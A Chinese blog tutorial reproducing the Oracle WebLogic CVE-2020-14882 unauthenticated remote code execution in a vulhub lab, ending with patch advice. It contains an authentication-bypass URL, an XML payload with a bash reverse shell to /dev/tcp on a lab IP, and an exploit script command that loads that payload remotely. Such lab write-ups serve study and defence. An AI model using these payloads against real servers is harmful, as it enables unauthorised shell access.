CVE-2020-14882 Oracle WebLogic远程命令执行漏洞

目录

1.漏洞信息

2.环境搭建

3.漏洞复现

4.漏洞利用

5.修复建议

漏洞信息

漏洞名称

Weblogic CVE-2020-14882未授权远程命令执行漏洞

漏洞编号

CVE-2020-14882

危害等级

高危

CVSS评分

9.8

漏洞类型

中间件漏洞

漏洞厂商

Oracle

漏洞组件

Oracle Weblogic server

受影响版本

10.3.6.0.0

12.1.3.0.0

12.2.1.3.0

12.2.1.4.0

14.1.1.0.0

漏洞概述

未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。

环境搭建

2.1 环境概述

  1. Linux(kali)
  2. vulhub/weblogic/CVE-2020-14882

2.2搭建过程

1.Kali下载vulhub仓库

CVE-2020-14882 Oracle WebLogic远程命令执行漏洞_第1张图片

2.进入vulhub/weblogic/CVE-2020-14882目录下,使用命令docker-compose up –d启动环境

CVE-2020-14882 Oracle WebLogic远程命令执行漏洞_第2张图片

3.浏览器访问:你的ip:7001/console/login/LoginForm.jsp成功访问表示环境搭建成功

CVE-2020-14882 Oracle WebLogic远程命令执行漏洞_第3张图片

 漏洞复现

  1. 这里我们并不知道登录后台的用户名和密码,这里有一个绕过验证权限漏洞,我们构造了一个URL:http://yourip:7001/console/images/%252E%252E%252Fconsole.portal访问成功进入了后台, 但这里后台权限过低无法执行其他操作。

CVE-2020-14882 Oracle WebLogic远程命令执行漏洞_第4张图片

漏洞利用

1.有回显的利用

(1)使用已经撰写好的poc利用工具

CVE-2020-14882 Oracle WebLogic远程命令执行漏洞_第5张图片

(2)在攻击机上利用,这里成功回显到用户

CVE-2020-14882 Oracle WebLogic远程命令执行漏洞_第6张图片

2.外置xml文件无回显命令执行

1)新建一个xml文件,文件内容为


  
    
      
 /bin/bash
        -c
        & /dev/tcp/192.168.132.129/4444  0>&1]]>
      
    
  

(2)开启服务端8000端口,使其能访问到poc.xml文件

CVE-2020-14882 Oracle WebLogic远程命令执行漏洞_第7张图片

CVE-2020-14882 Oracle WebLogic远程命令执行漏洞_第8张图片

(3)nc开启监听,端口为poc.xml中设置的端口

CVE-2020-14882 Oracle WebLogic远程命令执行漏洞_第9张图片

(4)攻击机中执行脚本

​
python3 CVE-2020-14882_ALL.py -u http://192.168.132.129:7001 -x http://192.168.132.129:8000/poc.xml

​

CVE-2020-14882 Oracle WebLogic远程命令执行漏洞_第10张图片

(5)监听端口可以查看已经成功获取到shell

CVE-2020-14882 Oracle WebLogic远程命令执行漏洞_第11张图片

 修复建议

  1. 及时下载官方补丁进行升级修复
  2. 禁止访问/console/console.portal

你可能感兴趣的:(安全,web安全)